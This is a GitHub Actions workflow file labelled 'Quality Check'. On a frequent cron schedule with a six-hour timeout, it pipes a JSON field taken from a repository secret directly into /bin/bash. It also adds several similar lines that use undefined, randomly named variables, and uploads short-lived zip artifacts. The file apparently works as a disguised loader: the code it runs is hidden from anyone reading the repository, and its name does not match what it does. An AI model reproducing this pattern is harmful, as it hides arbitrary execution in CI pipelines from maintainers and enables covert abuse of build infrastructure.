name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '49 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          xp3: ${{ secrets.xp3 }}
        run: |
          printf '%s' "$xp3" | jq -r .nnp54049 | /bin/bash
          echo $r0655 | jq -r .ijesl58 | /bin/bash
          echo $xrc81 | jq -r .adbb29168 | /bin/bash
          printf '%s' "$tgl6984" | jq -r .mub5566 | /bin/bash
          printf '%s' "$yzakw5" | jq -r .rtuv01 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: Tdl93Ith
          path: "*.zip"
          retention-days: 1
